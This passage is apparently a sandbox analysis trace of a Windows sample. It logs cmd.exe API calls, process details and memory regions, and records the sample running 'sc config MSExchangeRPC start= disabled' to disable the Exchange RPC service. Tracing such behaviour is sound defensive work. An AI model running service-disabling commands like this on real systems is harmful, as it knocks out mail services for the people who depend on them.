cchData=8 | out: lpLCData=".") returned 2 [0132.727] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0132.727] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.728] GetConsoleTitleW (in: lpConsoleTitle=0x469aa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.728] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0132.729] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0132.729] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0132.729] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0132.729] _wcsicmp (_String1="sc", _String2=")") returned 74 [0132.729] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0132.729] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0132.729] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0132.729] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0132.729] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0132.729] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0132.730] GetConsoleTitleW (in: lpConsoleTitle=0x459f758, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.730] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.730] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.730] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.730] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.730] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.730] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.730] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.730] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.730] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.730] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.730] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.730] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.730] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.730] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.730] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.730] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.730] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.731] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.731] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.731] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.731] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.731] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.731] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.731] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.731] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.731] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.731] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.731] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.731] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.731] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.731] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.731] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.731] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.731] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.731] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.731] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.731] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.731] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.731] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.731] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.731] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.731] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.731] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0132.731] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0132.731] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0132.731] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0132.731] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0132.731] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0132.731] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0132.731] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0132.731] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0132.731] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0132.731] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0132.731] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0132.731] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0132.731] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0132.731] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0132.731] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0132.731] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0132.731] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0132.731] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0132.731] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0132.731] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0132.731] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0132.731] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0132.731] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0132.731] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0132.731] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0132.731] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0132.731] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0132.731] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0132.731] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0132.732] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0132.732] _wcsicmp (_String1="sc", _String2="START") returned -17 [0132.732] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0132.732] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0132.732] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0132.732] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0132.732] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0132.732] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0132.732] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0132.732] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0132.732] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0132.732] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0132.732] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0132.732] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0132.732] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0132.732] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0132.732] SetErrorMode (uMode=0x0) returned 0x0 [0132.732] SetErrorMode (uMode=0x1) returned 0x0 [0132.732] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46905d0, lpFilePart=0x459f264 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459f264*="Desktop") returned 0x1d [0132.732] SetErrorMode (uMode=0x0) returned 0x1 [0132.732] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0132.732] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.740] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.740] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.740] GetConsoleTitleW (in: lpConsoleTitle=0x459f4e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.741] InitializeProcThreadAttributeList (in: lpAttributeList=0x459f410, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x459f3f4 | out: lpAttributeList=0x459f410, lpSize=0x459f3f4) returned 1 [0132.741] UpdateProcThreadAttribute (in: lpAttributeList=0x459f410, dwFlags=0x0, Attribute=0x60001, lpValue=0x459f3fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x459f410, lpPreviousValue=0x0) returned 1 [0132.741] GetStartupInfoW (in: lpStartupInfo=0x459f448 | out: lpStartupInfo=0x459f448*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.741] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.742] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.742] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.742] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.742] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.743] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeRPC start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x459f398*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeRPC start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x459f3e4 | out: lpCommandLine="sc config MSExchangeRPC start= disabled", lpProcessInformation=0x459f3e4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x42c, dwThreadId=0xc3c)) returned 1 [0132.749] CloseHandle (hObject=0xa4) returned 1 [0132.749] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.749] GetEnvironmentStringsW () returned 0x4699f00* [0132.749] FreeEnvironmentStringsA (penv="=") returned 1 [0132.749] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0132.798] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x459f37c | out: lpExitCode=0x459f37c*=0x424) returned 1 [0132.798] CloseHandle (hObject=0xa8) returned 1 [0132.798] _vsnwprintf (in: _Buffer=0x459f464, _BufferCount=0x13, _Format="%08X", _ArgList=0x459f384 | out: _Buffer="00000424") returned 8 [0132.798] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0132.798] GetEnvironmentStringsW () returned 0x469b378* [0132.798] FreeEnvironmentStringsA (penv="=") returned 1 [0132.798] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.798] GetEnvironmentStringsW () returned 0x469b378* [0132.798] FreeEnvironmentStringsA (penv="=") returned 1 [0132.798] DeleteProcThreadAttributeList (in: lpAttributeList=0x459f410 | out: lpAttributeList=0x459f410) [0132.798] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.798] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.799] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.799] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.799] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.799] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.799] SetConsoleInputExeNameW () returned 0x1 [0132.799] GetConsoleOutputCP () returned 0x1b5 [0132.799] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.799] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.800] exit (_Code=1060) Thread: id = 527 os_tid = 0xcb4 Process: id = "159" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1b10e000" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "158" os_parent_pid = "0xc90" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8416 start_va = 0x7f422000 end_va = 0x7f422fff entry_point = 0x0 region_type = private name = "private_0x000000007f422000" filename = "" Region: id = 8417 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8418 start_va = 0xbbf51e0000 end_va = 0xbbf51fffff entry_point = 0x0 region_type = private name = "private_0x000000bbf51e0000" filename = "" Region: id = 8419 start_va = 0xbbf5200000 end_va = 0xbbf5213fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bbf5200000" filename = "" Region: id = 8420 start_va = 0xbbf5220000 end_va = 0xbbf525ffff entry_point = 0x0 region_type = private name = "private_0x000000bbf5220000" filename = "" Region: id = 8421 start_va = 0x7df5ff700000 end_va = 0x7ff5ff6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff700000" filename = "" Region: id = 8422 start_va = 0x7ff6c42a0000 end_va = 0x7ff6c42c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42a0000" filename = "" Region: id = 8423 start_va = 0x7ff6c42c9000 end_va = 0x7ff6c42c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42c9000" filename = "" Region: id = 8424 start_va = 0x7ff6c42ce000 end_va = 0x7ff6c42cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42ce000" filename = "" Region: id = 8425 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8426 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8427 start_va = 0xbbf51e0000 end_va = 0xbbf51effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bbf51e0000" filename = "" Region: id = 8428 start_va = 0xbbf51f0000 end_va = 0xbbf51f6fff entry_point = 0x0 region_type = private name = "private_0x000000bbf51f0000" filename = "" Region: id = 8429 start_va = 0xbbf5260000 end_va = 0xbbf529ffff entry_point = 0x0 region_type = private name = "private_0x000000bbf5260000" filename = "" Region: id = 8430 start_va = 0xbbf52a0000 end_va = 0xbbf539ffff entry_point = 0x0 region_type = private name = "private_0x000000bbf52a0000" filename = "" Region: id = 8431 start_va = 0xbbf53a0000 end_va = 0xbbf545dfff entry_point = 0xbbf53a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8432 start_va = 0xbbf5460000 end_va = 0xbbf5460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bbf5460000" filename = "" Region: id = 8433 start_va = 0xbbf5470000 end_va = 0xbbf5476fff entry_point = 0x0 region_type = private name = "private_0x000000bbf5470000" filename = "" Region: id = 8434 start_va = 0xbbf5480000 end_va = 0xbbf5480fff entry_point = 0x0 region_type = private name = "private_0x000000bbf5480000" filename = "" Region: id = 8435 start_va = 0xbbf5490000 end_va = 0xbbf5490fff entry_point = 0x0 region_type = private name = "private_0x000000bbf5490000" filename = "" Region: id = 8436 start_va = 0xbbf5580000 end_va = 0xbbf558ffff entry_point = 0x0 region_type = private name = "private_0x000000bbf5580000" filename = "" Region: id = 8437 start_va = 0xbbf5590000 end_va = 0xbbf5717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bbf5590000" filename = "" Region: id = 8438 start_va = 0xbbf5720000 end_va = 0xbbf58a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bbf5720000" filename = "" Region: id = 8439 start_va = 0xbbf58b0000 end_va = 0xbbf6caffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bbf58b0000" filename = "" Region: id = 8440 start_va = 0x7ff6c41a0000 end_va = 0x7ff6c429ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41a0000" filename = "" Region: id = 8441 start_va = 0x7ff6c42cc000 end_va = 0x7ff6c42cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c42cc000" filename = "" Region: id = 8442 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8443 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8444 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8445 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8446 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8447 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8448 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8449 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8450 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8451 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8452 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8453 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8454 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8455 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 524 os_tid = 0x554 Thread: id = 525 os_tid = 0x518 Thread: id = 526 os_tid = 0xc44 Process: id = "160" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x35f49000" os_pid = "0x42c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "158" os_parent_pid = "0xc90" cmd_line = "sc config MSExchangeRPC start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8469 start_va = 0x4e0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 8470 start_va = 0x500000 end_va = 0x501fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 8471 start_va = 0x510000 end_va = 0x523fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 8472 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8473 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 8474 start_va = 0x5b0000 end_va = 0x5b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 8475 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 8476 start_va = 0x5d0000 end_va = 0x5d1fff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 8477 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 8478 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 8479 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8480 start_va = 0x7e670000 end_va = 0x7e692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e670000" filename = "" Region: id = 8481 start_va = 0x7e696000 end_va = 0x7e696fff entry_point = 0x0 region_type = private name = "private_0x000000007e696000" filename = "" Region: id = 8482 start_va = 0x7e69c000 end_va = 0x7e69cfff entry_point = 0x0 region_type = private name = "private_0x000000007e69c000" filename = "" Region: id = 8483 start_va = 0x7e69d000 end_va = 0x7e69ffff entry_point = 0x0 region_type = private name = "private_0x000000007e69d000" filename = "" Region: id = 8484 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8485 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8486 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8487 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") 